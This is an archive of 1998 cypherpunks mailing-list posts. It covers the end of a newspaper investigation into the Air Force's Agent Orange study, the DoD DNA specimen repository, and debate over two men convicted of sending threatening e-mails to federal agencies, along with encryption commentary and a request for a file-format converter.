During a ceremony to announce the legislation, President Bush proclaimed:
"We are here today to ensure that our nation will ever remember those who
defended her, the men and women who stood where duty required them to stand."

Undue influence?

Murphy Chesney, a retired lieutenant general, was an important player in
both the Ranch Hand study and the Ranch Hand spraying missions.

In Vietnam, as the officer in charge of the health and safety of Air Force
personnel, he could have recommended against spraying herbicides if he
thought they might be dangerous. But he shared the then-prevailing opinion
that Agent Orange, named for the color of the stripe around its 55-gallon
storage containers, wouldn' t hurt the troops. 

After the war, he oversaw the Ranch Hand study from 1979 until he was
promoted to Air Force surgeon general in 1985.

Chesney couldn' t say whether his role in Operation Ranch Hand influenced
his decisions in the Ranch Hand study.

"I hope it didn' t," he said in an interview.

But Albanese, who worked on the study during the years Chesney was
involved, believes it did. He recalled a dispute with a colleague, Wolfe,
over data analysis. Chesney sided with Wolfe.

"Then," Albanese said, "Gen. Chesney pulled me aside and said, ' If I had
to accept your analysis, I' m not sure I could live with myself.' "I could
see the water in his eyes.

"He said he had approved some of those spraying activities."

Chesney said no such conversation took place.

But Chesney did remember ordering the scientists to comply with advisory
committee recommendations, although such influence by the Air Force is
prohibited by the rules of the study design.

Looking back, Albanese said, it should have been obvious that the conflict
of interest was too strong for the study to be objective.

"There' s a faction that doesn' t want to pay the price of treating the
veterans," he said, "and a faction that doesn' t want to have made them sick."

Birth defects acknowledged

In August 1992, the Air Force finally published a Ranch Hand birth defects
report.

Michalek said the Air Force had withheld the 1984 birth defects report
because the advisory committee said it was incomplete. Ranch Hand
scientists had verified records of babies with birth defects, but had not
yet checked the healthy ones.

In the draft of the report, the scientists wrote that it would take about a
year to verify records of the healthy babies. But eight years passed before
a report came out.

The 1992 report confirmed the high rate of birth defects and infant deaths
among children fathered by Ranch Hand veterans. But the scientists wrote
that because the birth defects did not increase consistently with dioxin
exposure, Agent Orange wasn' t to blame.

But that might be inaccurate, the National Academy of Sciences concluded in
1994. The academy criticized the Ranch Hand study and singled out the 1992
birth defects report as an example of its many flaws.

"It was confusing how the analysis of the birth defects was presented,"
said Kathleen Rodgers, one of 16 contributors to the National Academy of
Sciences study, "Veterans and Agent Orange."

"I remember being incensed at the time that we couldn' t get anything out
of it," said Rodgers, an associate professor at the University of Southern
California School of Medicine.

The Air Force scientists, examining a study group that was small to begin
with, had omitted hundreds of subjects from the analysis, the academy said.
That made it harder to connect birth defects to Agent Orange.
 
Or easier not to.

"Some aspect of the Ranch Hand experience seems to have increased the risk
of fathering children with birth defects," the academy report said, "but
the implications of this finding are unclear."

The Air Force, of course, knew that 10 years earlier but sat on the
information.

"It' s the worst thing I have ever seen from the point of view of medical
reporting," Albanese said.

Releasing the data

In recent years, as the Agent Orange controversy has faded from the public'
s consciousness, the Ranch Hand advisory committee' s role has diminished. 

During its meeting last week in San Antonio -- the first such gathering
since 1995 -- Michalek briefed the committee on the Union-Tribune' s
investigation of the study.

Michalek asked Albanese to detail his concerns about unpublished data and
government interference. Afterward, Albanese suggested that the raw Ranch
Hand data be made public, repeating an idea he has advocated for years.
That way, he said, researchers outside the military might come up with new
and useful analyses.

Advisory committee Chairman Robert W. Harrison recommended that everything
should be released, except for information that would violate the
confidentiality of the subjects. Michalek said he would comply.

Harrison, a professor of medicine at the University of Rochester, said that
he and his colleagues on the panel should start looking more closely at how
the study is conducted and its findings.

Expanded compensation

Last year, the Air Force announced its first link between Agent Orange and
a serious illness.

The Ranch Hand veterans have a higher rate of diabetes.

Air Force scientists saw the diabetes increase in 1992 but waited five
years to make it public. Michalek said they wanted to be sure.

The delay came as no surprise to Daschle and his aide, Petrou, who are
still upset with the Air Force for withholding information about cancer and
birth defects.

"Delay is clearly their major tactic," Petrou said. "The delay is justice
denied. It' s extremely disturbing.

"From a public health perspective and from a moral perspective in terms of
how we treat veterans, there' s no excuse good enough for this."

Daschle has given up on the Ranch Hand study. But he has worked around it
with some success.

The National Academy of Sciences has continued its investigation, examining
studies of Vietnam veterans and those of civilians exposed to dioxin in
industrial accidents.

As the academy links additional diseases to dioxin, more Vietnam veterans
get help.

The VA -- now the Department of Veterans Affairs -- has expanded its Agent
Orange compensation list to 10 diseases, mostly cancers. Spina bifida, a
serious spinal deformity, is the only birth defect on the list so far.

As of April, the VA had received 92,276 Agent Orange claims from veterans
and their survivors. Claims approved for diseases on the compensation list
totaled 5,908.

Patti Robinson remains a part of the larger group. The academy hasn' t
found enough evidence that Agent Orange caused malignant melanoma, the
cancer that took her husband.

Which leaves Robinson where she was 15 years ago.

She still believes Agent Orange killed her husband and disabled her son. 

But she can' t be sure.

And that' s what really hurts, she said.

"Look at all the years that have gone by, and there' s still no clear-cut
answer."

Copyright 1998 Union-Tribune Publishing Co.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:50:12 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] The DoD DNA Registry and Specimen Repository
Message-ID: <199811022344.PAA28432@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] The DoD DNA Registry and Specimen Repository
Date: Sun, 1 Nov 1998 11:49:05 -0600
To: ignition-point@majordomo.pobox.com


SCAN THIS NEWS
11/1/98


"The blood is placed on special cards with the service member's Social
Security number, date of birth, and branch of service designated on the
front side of the card. On the reverse side of the bloodstain card are a
fingerprint, a bar code, and signature attesting to the validity of the
sample."

**************************************************

The DoD DNA Registry and DoD Specimen Repository for Remains
Identification

http://www.afip.org/homes/oafme/dna/afdil.html

Historical Overview:

The U.S. military recognized the value of DNA testing as a necessary adjunct
to traditional identification efforts. In a memorandum dated December 16,
1991, the Deputy Secretary of Defense authorized the Assistant Secretary of
Defense (Health Affairs) to establish policies and requirements for the use
of DNA analysis in the identification of remains. To carry out these
policies, the establishment of a DNA Registry, to include a Specimen
Repository for Remains Identification and a DNA Identification Laboratory
were authorized under the Office of the Armed Forces Medical Examiner
(OAFME). On January 5, 1993, the Assistant Secretary of Defense (Health
Affairs) issued a policy guidance for the establishment of a repository of
specimen samples to aid in the remains identification using genetic
analysis. On May 17, 1993, the Surgeon General, U.S. Army, was delegated as
Executive Agent for the DNA Registry. On March 9, 1994, the Assistant
Secretary of Defense (Health Affairs) issued a Memorandum of Instruction to
the Service Secretaries establishing policies and procedures for the
collection of DNA specimens. On April 2, 1996 policy refinements were issued
to the DoD DNA Registry. In October 1994 the DNA Registry received approval
from the American Society of Crime Laboratory Directors for the production
of DNA proficiency tests used by forensic DNA laboratories. AFDIL is one of
four DNA laboratories to receive this approval in the United States.

In January 1995 the Defense Science Board concurred with the use of
mitochondrial DNA testing for associated and unassociated remains. Although
AFDIL is capable of conducting more common nuclear DNA testing, nuclear DNA
testing is not possible on ancient remains.


DoD Specimen Repository for Remains Identification

The DoD DNA Specimen Repository provides reference material for DNA analysis
to assist in the remains identification process. A dried bloodstain and
buccal swab are being collected from all Active Component (AC) personnel. A
total of three DNA specimens are collected. One bloodstain card is stored in
a pouch in the service member's medical record; another bloodstain card and
a buccal swab are stored at the Armed Forces Repository for Specimen Samples
for the Identification of Remains. The blood is placed on special cards with
the service member's Social Security number, date of birth, and branch of
service designated on the front side of the card. On the reverse side of the
bloodstain card are a fingerprint, a bar code, and signature attesting to
the validity of the sample. Ultimately, the bloodstain card is stored in a
vacuum-sealed barrier bag and frozen at -20 degrees Celsius, in the Specimen
Repository. The oral swab (buccal scrapping) is fixed in isopropanol and
stored at room temperature. Great care is taken to prevent the possibility
of error from sample switching or mislabeling. Additionally, the specimens
are considered confidential medical information, and military regulations
and federal law exist to cover any issues on privacy concerns. As of
December 1994, DNA collections were being made from all newly accessioned
personnel, the residual AC members, and select high risk Reserve Component
(RC) members. Large scale RC collection are scheduled to begin collection in
FY 96. Collections are being made from any service member deployed to a
hostile fire or imminent danger area. During CY 94, collections were made
from personnel deploying to Somalia, Rwanda, Haiti, Bosnia, and Latin
America. All services are at least 90% complete with collections of special
operations, aviation, and high risk duty personnel. The remaining AC
individuals will be collected through FY 98, at the time of their annual
physical.

As of 31 December 1995, the Repository has received 1.15 million DNA
specimens. Specimens come into the Repository at the rate of 3,000 - 4,000
per day. The updated Specimen Management System (SMS), using the Defense
Eligibility Enrollment System (DEERS) database, verifies service member
information. In CY 95, the Repository established an on-line datalink with
DEERS. All DNA specimens will be maintained for fifty years, before being
destroyed. Individual specimen samples will be destroyed upon request of the
donor following the conclusion of the donor's complete military service
obligation (including individually ready reserve status or subject to active
duty recall) or other applicable relationship to DoD.

----------------------------------------------------------------------------
----

MEMORANDUM FOR ASSISTANT SECRETARY OF THE ARMY (M&RA)
               ASSISTANT SECRETARY OF THE NAVY (M&RA)
               ASSISTANT SECRETARY OF THE AIR FORCE (MRAI&E)

SUBJECT: Casualty Identification Policy

http://ippsrs.ha.osd.mil/main/caid9651.html


July 18, 1996

References: (a) Deputy Secretary of Defense Memorandum 47003, "Establishment
of a Repository of Specimen Samples to Aid in Remains Identification Using
Genetic Deoxyribonucleic Acid (DNA) Analysis," 16 December 1991.

(b) Assistant Secretary of Defense (Health Affairs) Memorandum and Policy
Statement, "Establishment of a Repository of Specimen Samples to Aid in
Remains Identification Using Genetic Deoxyribonucleic Acid (DNA) Analysis,"
5 January 1993.

(c) Assistant Secretary of Defense (Health Affairs) Memorandum, "Memorandum
of Instruction of Procedures for the Collection and Shipment of Specimens
for Submission to the Deoxyribonucleic Acid (DNA) Specimen Repository," 9
March 1994.

(d) Privacy Act System of Records Notice for System A0040-57aDASG, "DoD DNA
Registry," 60 Fed. Reg. 31, 287-8, 14 June 1995.

(e) Assistant Secretary of Defense (Health Affairs) Memorandum, "Policy
Refinements for the Armed Forces Repository of Specimen Samples for the
Identification of Remains," 2 April 1996.


Reference (a) delegated authority to the Assistant Secretary of Defense
(Health Affairs) (ASD(HA)) to issue policies and requirements for the
establishment of a registry and appropriate specimen repository that will
aid in the remains identification process by the use of DNA profile
analysis. References (b) and (c) established policies and procedures for
operation of the repository. Reference (d) formalized the system of records
for the repository. Reference (e) refined the policies for the operation of
the repository.

Primary casualty identification is fundamental to the elements of
medicolegal death investigations and involves the use of one or more
complementary methods including fingerprints, footprints, dental
comparisons, DNA identifications and superimposable radiographic techniques.
The duplicate dental panograph repository or Central Panograph Storage
Facility (CPSF) in Monterey, California was established in 1986 and has been
used more than 1000 times over the last ten years largely by DoD agencies
with close to 100 percent success. In 1991, DoD embarked on the creation and
implementation of a DNA Registry including the Armed Forces Repository of
Specimen Samples for Identification of Remains and Armed Forces Casualty
Identification Laboratory both of which are components of the Armed Forces
Institute of Pathology (AFIP). The Repository accessions approximately 5,000
files/day with original plans of having all servicemembers (active, reserve
and guard) on file by FY 2002. Comparative DNA casualty identification is
now the DoD preferred standard of positive casualty identification, making
the duplicate panograph obsolete.

The CPSF will be discontinued on 31 December 1999. Therefore, I request that
you take all necessary measures to ensure an accelerated acquisitions
program of servicemember DNA specimens to include active, reserve and guard
components for purposes of casualty DNA profile identification. A DNA sample
should be obtained from all new accessions; duplicate panographs will not be
taken on new accessions and no servicemember is to deploy without having a
DNA specimen on file. The DEERS Data Bank shall be used to ensure that
servicemembers do in fact have a DNA specimen on file. While updated
radiographs will continue to be part of a servicemember's medical/dental
record, no new radiographs will be received by the Repository, effective
this date.

Please provide me with a copy of your plan to implement this accelerated
request by 23 August 1996. The point of contact for this action is Captain
Glenn Wagner, Deputy Director, Armed Forces Institute of Pathology, (202)
782-2103. Colonel Salvatore M. Cirone is the OASD(HA) point of contact,
(703) 695-7116.


Stephen C. Joseph, M.D., M.P.H.

cc:
ASD(RA)

HA POLICY 96-051


**************************************************
[Related info regarding DNA samples from children]
**************************************************

New Guardian DNA Helps You Keep Your Baby Safe

DNA Identification System Places State-of-the-Art Technology into Parents
Hands
Worried about hospital mix-ups or infant/child abductions? Guardian DNA
Identification System consists of an easy-to-use DNA collection kit, an
instructional safety video, a DNA sample storage facility, a recording
system that provides for complete anonymity, and PIN/barcode security
feature so that only parent authorized access is possible. Guardian DNA uses
the same technology and methodology used by the U.S. Armed Forces.
Collection can be performed at-home at any age, but for added newborn
security parents will want to have one immediately after the birth. Retails
for $49.95. Available through select hospitals and physicians, or by calling
InVitro International at 1-800-246-8487 Ext. 230, or visit their web site at
http://www.invitrointl.com/guardian.htm/


--------------------------------------------------

http://www.yellodyno.com/html/dnahome.html

 "Parents will feel more secure knowing they have their child's
 DNA 'fingerprints' safely stored away."

    - Dr. Martin H. Smith, Pediatrician and former President of
      the American Academy of Pediatrics


DNA I.D. is, without question, the future of identification. For one thing,
DNA I.D. (also known as "genetic fingerprinting") is the only virtually
positive and permanent identification method. For example, photographs fade
and must be updated, and fingerprints can smear or be difficult to acquire
(getting a proper child's fingerprint can be very difficult), but each
person's DNA does not change for his entire life. DNA (deoxyribonucleic
acid) molecules are that part of the human physiology which carries the
genetic "blueprint" that makes each person unique. Each person's "genetic"
makeup is exclusive and never changes for their entire life. As such, "DNA
fingerprinting" can provide reliable identification even when it may be
impossible to recover a fingerprint. Further, DNA I.D. is generally
admissible in court, and can be invaluable in reuniting parents with their
children in the case of parental abductions, kidnappings, accidents, and
natural disasters.

DNA identification is now available to families in an easy-to-use, at-home
kit. With the "do-it-yourself" DNA I.D.Kit, it takes parents only minutes to
capture, preserve, and store-at-home their child's genetic "fingerprints."
Tens of thousands of parents are already keeping their children's "genes" at
home. The DNA I.D. Kit provides a way of properly taking, recording, and
storing genetic samples in a patented, tamper-proof system.

Yello Dyno says "O.K., this is where you might get a little 'squeemish,' but
read on, because this is really cool and easy ... and something every parent
needs to consider for their child (or any member of their family, for that
matter!). This is how it works."

The genetic material is derived from very small samples hair and blood. The
kit includes a virtually painless, spring-loaded, medical quality puncture
tool to help draw a few drops of blood from the finger, which is then placed
on a special absorptive paper card. After air drying for a little while, the
card is then placed in one of the special foil tamper-proof envelopes for
preserving and storing, on which personal information is recorded. If you
are too uncomfortable to use the puncture tool, the hair sample by itself
should suffice, which is stored and recorded the same way. Many parents just
take the kit to their pediatrician and have them draw the drops of blood.
Then, a personal information card on your child is filled out, including
attaching a picture. A fingerprint card is also included along with special
fingerprinting material and instructions. After you are done, everything is
then put in another, larger foil tamper-proof envelope and sealed. Personal
information is then recorded on the envelope and it is ready to be put in a
safe place. Unrefrigerated the samples should last for many years (they are
dry). Refrigeration will extend viability of samples much longer.
Unrefrigerated renewal is recommended once every five years.

Again, this patented system is a way of properly taking, storing, and
preserving genetic samples, not the actual test. If the DNA sample is ever
needed to make a genetic match the process is usually initiated by law
enforcement or some other agency. (Beware of suggestions to "make your own
DNA I.D." While storing DNA samples at home can be simple with a specially
made medical product like this, it can be completely ineffective without the
right procedures.) The DNA I.D. Kit can also be a part of your at-home fact
file. By combining an up-to-date child I.D. card and the DNA I.D. Kit,
parents can have a valuable child identification system.

DNA is so important to the future of identification that it is already being
used by the FBI and the U.S. Armed Forces. In fact, DNA I.D. is the
preferred method of identification for law enforcement, as seen in more and
more court cases recently. "DNA Analysis . . . is considered the most
important advance in forensics since fingerprinting. Its use in U.S. courts
has skyrocketed from 14 cases by the end of 1987 to 12,000 by mid-1993,"
according to an article in the Austin-American Statesman in June 1994. The
FBI is implementing a national DNA database, called CODIS, to track people
by their DNA. The U.S. Army started a genetic depository in 1992 that will
eventually include the DNA of every American in uniform. The U.S. Army's
goal is to have no more "unknown soldiers." DNA is also already being used
to identify missing children. For example, in December, 1993, a two-year old
was returned to his parents two years after being kidnapped - only after
police established scientifically who the child was by using "genetic
fingerprinting."

If you are ever separated from your child and time passes, DNA analysis is
probably the only way of making a virtually fool-proof identification. This
remarkable kit provides you with the tools you need.

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 3 Nov 1998 08:36:30 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Bic-Assassins Convicted
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B22A@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Typical statist media skewing by entangling allegations, accusation,
speculation and acquitted charges with real convicted charges.

--- [revised]

    Two men convicted of sending threatening email

    BROWNSVILLE, Texas (AP) -- Johnie Wise, 72, and Jack Abbott 
    Grebe, 43, were convicted Thursday of two counts of sending 
    threatening e-mails -- one message to the Internal Revenue 
    Service and one to the Drug Enforcement Agency. 

    They could get life in prison at their Jan. 29 sentencing. 

---
  United States Constitution

   Amendment VIII - Excessive bail or fines and cruel punishment prohibited.
Ratified 12/15/1791.

   Excessive bail shall not lie required, nor excessive fines imposed, nor
cruel and unusual punishments inflicted.
---


Life imprisonment for sending threatening email? If IRS or DEA agents
threaten someone by email, do they face life imprisonment, or just the other
way around?

	Matt





-----Original Article-----

CNN

http://www.cnn.com/US/9810/30/weapons.case.ap/

Two men convicted in biological weapons case

October 30, 1998

Web posted at: 3:10 a.m. EST (0810 GMT) 

BROWNSVILLE, Texas (AP) -- Two men accused of scheming to 
attack President Clinton and others with cigarette lighters 
equipped with poison-coated cactus needles were convicted 
of sending threatening e-mail. 

Johnie Wise, 72, and Jack Abbott Grebe, 43, were convicted 
Thursday of two counts of sending threatening e-mails -- one 
message to the Internal Revenue Service and one to the Drug 
Enforcement Agency. 

Grebe and Wise were acquitted on one count each of conspiracy 
to use weapons of mass destruction count and five counts each 
of sending threatening messages -- to President Clinton, U.S. 
Customs, the FBI, the Bureau of Alcohol Tobacco and Firearms, 
and the Secret Service. 

They could get life in prison at their Jan. 29 sentencing. 

Prosecutors said Wise schemed to modify a cigarette lighter 
so it would shoot cactus needles coated with toxins such as 
rabies, botulism, anthrax or HIV. 

Defense attorneys called idea 'silly'

Among the men's alleged targets: Clinton, the U.S. and Texas 
attorneys general, and FBI Director Louis Freeh. 

Defense attorneys called the idea "silly" and "cockamamie." 
There was never any evidence that the accused possessed 
biological weapons or tried to develop a deadly lighter. The 
e-mailed threats were vaguely worded and did not discuss the 
lighter or cactus thorns. 

Under federal law, however, the threats were enough for a 
conviction and no biological weapons were needed, prosecutors 
said. 

The men would have carried out their plan to hurt government 
employees and their families if they hadn't been arrested, 
Assistant U.S. Attorney Mervyn Mosbacker said. 

Wise and Grebe were accused of concocting the plan to threaten 
government officials with e-mails. One e-mail, sent June 12, 
was titled "Declaration of War" and a second one, sent June 26, 
said government workers had been "targeted for destruction by 
revenge." 

A third defendant, Oliver Dean Emigh, 63, was acquitted on all 
counts. He was accused of writing the June 12 message, but the 
charges against the men stemmed from the June 26 e-mail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 3 Nov 1998 08:15:10 +0800
To: cypherpunks@cyberpass.net
Subject: dbts: Lions and TEMPESTs and Black Helicopters (Oh, My!)
In-Reply-To: <363DF8EB.24CF@lsil.com>
Message-ID: <v04020a0ab263d0da7260@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 1:24 PM -0500 on 11/2/98, Mr. Motyka vamps on Mr. May in cypherpunks:

> > VERY FEW PEOPLE CARE ABOUT SECURITY.
> >
> Since they don't have anything to hide, why should they worry? Argh.
> ergo - if they're hiding something they are guilty of something. Bust
> the doors down boys.

Naaawww.... It's not so bad as all that...

Remember, fairly soon now, if not already, we'll be storing *lots* of
encrypted data on our disks, not only in the form of encrypted,
controlled-play software, or proprietary company information, or infotainment
(however long *that* lasts), but also in the form of encrypted passwords,
private keys, and, of course, digital bearer certificates ;-).

In addition, every time you do a book-entry transaction, you're perforce
(heh...) using an encrypted link with at least SSL, and, at some point, people
will demand much cheaper and faster internet-level encryption ala IPSEC to
move their money (and their other bits worth money) around. Or they'll be
required to by their employers in various VPN/WAN systems. Or, frankly,
they'll just do it without knowing it anyway, because their TCP/IP apps will
be IPV6 (or something) compliant.

Everyone here who does this stuff for a living knows that the amount of
horsepower necessary to decrypt all those different kinds of encrypted stuff,
even the weak stuff, is going to be positively prohibitive (instead of
permitted? ;-)), since it all has different keys, lots of which are long gone.
IPSEC keys, for instance, are positively disposable, and, if it's done right
- -- which it will be, because nobody wants to lose *money*, after all --
the encrypted packets will originate at the client, and not the router, so all
that "private doorbell" stuff is just a smokescreen for what is going to be
superencrypted data anyway.

And, of course, we all know now that KRAP / ne Key Escrow / ne GAK / ne Key
Recovery / ne Clipper is logically, much less physically, impossible. Don't
ask me, ask the likes of Diffie, and Rivest, and Schneier, et alia. All the
"legislation" in the world ain't gonna change that, right?


Digital Commerce is Financial Cryptography, folks.

F=MA. It ain't just for physicists anymore...


The black helicopters aren't flying over the hill any time soon, boys and
girls. Why? Because, if they tried, soon enough, they couldn't afford the gas
for a return visit. Their erstwhile tax revenue, like most money, being
fungible and all, is, or soon will be, quite easy enough to bug out into the
cyphersphere with. After all, who's to tell one encrypted blop of bits from
another?

"Awwwww, C'Monnnn. Niiiice taxpayer. Staaaaay. *Don't* go anywhere.
Pleeeeease?"


A cowardly lion indeed.


Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNj4wNcUCGwxmWcHhAQEsewf9GbZ2OxeczWZzeNAuBwBm+PlWvZAdOmml
UYmik/U4s41x310HtXdPg2ixnUJ/i67rWXYGHeGeAZrbn0IYH69dM7l0qSROSHnM
dDMLA18nZjIy1XKzcG0yrRfsbLKtfFpe3Y4SN8dHoTRKzzfoskhmQJWu9/2twVKi
Y3gFgd5Qawu4a23jmMOGRJ1pLUpo9jjTu2qs8uA0Q42aeWcm4Zm1QhaK9/9FV9Sm
FkbHTgzK6RwaLiKySkqf22KNsy6WLa9ypVLK03tMrJNgILqY2S3xxoM/2EOhf+FF
5yt16/bABw3YvS8WWp2PkmHMn1rxXgBy1iodioFI79Cf35Yu36/O4Q==
=GPbv
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 3 Nov 1998 10:40:16 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Bic-Assassins Convicted (fwd)
In-Reply-To: <199811030021.SAA02609@einstein.ssz.com>
Message-ID: <v0313031eb26413ac65dd@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:21 PM -0800 11/2/98, Jim Choate wrote:
>Forwarded message:
>
>> From: Matthew James Gering <mgering@ecosystems.net>
>> Subject: RE: Bic-Assassins Convicted
>> Date: Mon, 2 Nov 1998 15:57:43 -0800
>
>>     BROWNSVILLE, Texas (AP) -- Johnie Wise, 72, and Jack Abbott
>>     Grebe, 43, were convicted Thursday of two counts of sending
>>     threatening e-mails -- one message to the Internal Revenue
>>     Service and one to the Drug Enforcement Agency.
>>
>>     They could get life in prison at their Jan. 29 sentencing.
>
>I have a question, if they had threatened just a plain old citizen with
>this email would they also be facing this life imprisonment?
>

A very good point.

I've had cretins make death threats against me, threats which were probably
more realizable than these "Bic assassins" were fantasizing about, yet I'm
sure the local cops would have told me to chill out and just let it ride
had I brought the threats to their attention.

It sure is looking, pace this case and the Bell and CJ cases, that the
courts are being put at the service of government employees who feel
threatened.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 3 Nov 1998 09:08:33 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Bic-Assassins Convicted (fwd)
Message-ID: <199811030021.SAA02609@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Bic-Assassins Convicted
> Date: Mon, 2 Nov 1998 15:57:43 -0800 

>     BROWNSVILLE, Texas (AP) -- Johnie Wise, 72, and Jack Abbott 
>     Grebe, 43, were convicted Thursday of two counts of sending 
>     threatening e-mails -- one message to the Internal Revenue 
>     Service and one to the Drug Enforcement Agency. 
> 
>     They could get life in prison at their Jan. 29 sentencing. 

I have a question, if they had threatened just a plain old citizen with
this email would they also be facing this life imprisonment?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Tue, 3 Nov 1998 11:17:40 +0800
To: <cypherpunks@Algebra.COM>
Subject: s-format file converter?
Message-ID: <000d01be06d4$f42d5e80$33248bd0@luckylaptop.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



I need to convert some files stored in Motorola s-format (widely used for
input into EPROM burners) to a binary blob of data my debugger can read. I
know there is a GNU utility that supports converting to and from s-format
and a wide variety of other file formats, but a web search turned up empty.

If you know where to find such a utility for UNIX, please let me know.

Thanks,
--Lucky Green <shamrock@netcom.com>
  PGP 5.x  encrypted email preferred




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 3 Nov 1998 12:36:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Lions and TEMPESTs and Black Helicopters (Oh, My!)
Message-ID: <363E80C1.4084@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> "Awwwww, C'Monnnn. Niiiice taxpayer. Staaaaay. *Don't* go anywhere.
> Pleeeeease?"
>
***

By and large I agree with you, the fears of TotalControl(tm) are largely
unfounded. Abuses do exist. Always have.

***

These unregulated virtual economies need to conduct trade with
ActualPhysicalSpace. The interface is where the control will be exerted.
If you can't safely convert your LibertE$ to physical goods their value
will be quite low. Participation will be limited.

Also, as the TaxAorta becomes occluded the TaxDoctors will have to
devote more energy and use more drastic methods to keep the flow going. 

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Nov 1998 10:29:18 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Bic-Assassins Convicted (fwd)
In-Reply-To: <199811030021.SAA02609@einstein.ssz.com>
Message-ID: <199811030150.UAA07116@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate asked:

>If they had threatened just a plain old citizen with this 
>email would they also be facing this life imprisonment?

Apparently the charges would have been the same if made 
against any 

  "person within the United States, and the results of such 
  use affect interstate or foreign commerce or, in the case 
  of a threat, attempt, or conspiracy, would have affected 
  interstate or foreign commerce." (see below)

The use of E-mail was incidental to the charges of both 
conspiracy and threatening to use weapons of mass destruction:

  18:2332(a)(2) and (c)(2)(C). Conspiracy to use a weapon 
  of mass destruction against person(s) w/in the U.S. 
  the results of which affected interstate & foreign 
  commerce.  Offense dates:  3/24/98 - 6/30/98.  Penalty:  
  Any term of years or for life, $250,000, 5 yrs SRT.  (1)

  18:2332a(a)(2) and (c)(2)(C) and 2.  Threatening to use a
  weapon of mass destruction. Offense date:  6/26/98
  Penalty:  any term of years or Proceedings include all events.
  for life, $250,000, 5 yrs SRT as to ea ct. (2 - 8)

The eight counts are for the one count of conspiracy and
threats against seven federal agencies ("employees and
families"):

  The President
  ATF
  FBI
  DEA
  IRS
  Secret Service
  Custom Service

----------

The crimes are defined in 18 USC 2332a, below.

Source: http://law.house.gov/usc.htm

----------

TITLE 18 - CRIMES AND CRIMINAL PROCEDURE
PART I - CRIMES

CHAPTER 113B - TERRORISM

Sec. 2332a. Use of weapons of mass destruction

 (a) Offense Against a National of the United States or Within the
United States. - A person who, without lawful authority, uses,
threatens, or attempts or conspires to use, a weapon of mass

destruction, including any biological agent, toxin, or vector (as
